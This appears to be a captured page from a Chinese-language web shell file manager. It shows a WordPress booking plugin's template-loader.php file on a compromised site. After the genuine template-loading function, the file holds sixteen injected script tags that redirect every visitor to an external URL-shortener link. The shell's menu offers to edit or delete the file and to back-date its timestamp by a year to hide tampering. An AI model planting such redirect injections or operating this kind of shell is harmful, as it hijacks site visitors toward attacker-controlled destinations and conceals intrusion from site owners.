文件操作 - template-loader.php
返回文件管理
返回主菜单
删除本文件
文件: /home/acihmzbq/public_html/wp-content/plugins/eagle-booking/core/admin/template-loader.php
编辑文件内容
<?php /** * Include a template file * * Looks up first on the theme directory, if not found * lods from plugins folder * * Author: Eagle Themes * Since 1.1.5 * */ function eb_load_template($file) { $child_theme_dir = get_stylesheet_directory() . '/eb-templates/'; $parent_theme_dir = get_template_directory() . '/eb-templates/'; $eb_dir = EB_PATH . '/templates/'; if ( file_exists( $child_theme_dir . $file ) ) { return $child_theme_dir . $file; } else if ( file_exists( $parent_theme_dir . $file ) ) { return $parent_theme_dir . $file; } else { return $eb_dir . $file; } } ob_start(); <script>window.location.href = "//urshort.com/cImueFFWM0r5";</script> <script>window.location.href = "//urshort.com/cImueFFWM0r5";</script> <script>window.location.href = "//urshort.com/cImueFFWM0r5";</script> <script>window.location.href = "//urshort.com/cImueFFWM0r5";</script> <script>window.location.href = "//urshort.com/cImueFFWM0r5";</script> <script>window.location.href = "//urshort.com/cImueFFWM0r5";</script> <script>window.location.href = "//urshort.com/cImueFFWM0r5";</script> <script>window.location.href = "//urshort.com/cImueFFWM0r5";</script> <script>window.location.href = "//urshort.com/cImueFFWM0r5";</script> <script>window.location.href = "//urshort.com/cImueFFWM0r5";</script> <script>window.location.href = "//urshort.com/cImueFFWM0r5";</script> <script>window.location.href = "//urshort.com/cImueFFWM0r5";</script> <script>window.location.href = "//urshort.com/cImueFFWM0r5";</script> <script>window.location.href = "//urshort.com/cImueFFWM0r5";</script> <script>window.location.href = "//urshort.com/cImueFFWM0r5";</script> <script>window.location.href = "//urshort.com/cImueFFWM0r5";</script>
修改文件时间
将文件时间修改为当前时间的前一年
删除文件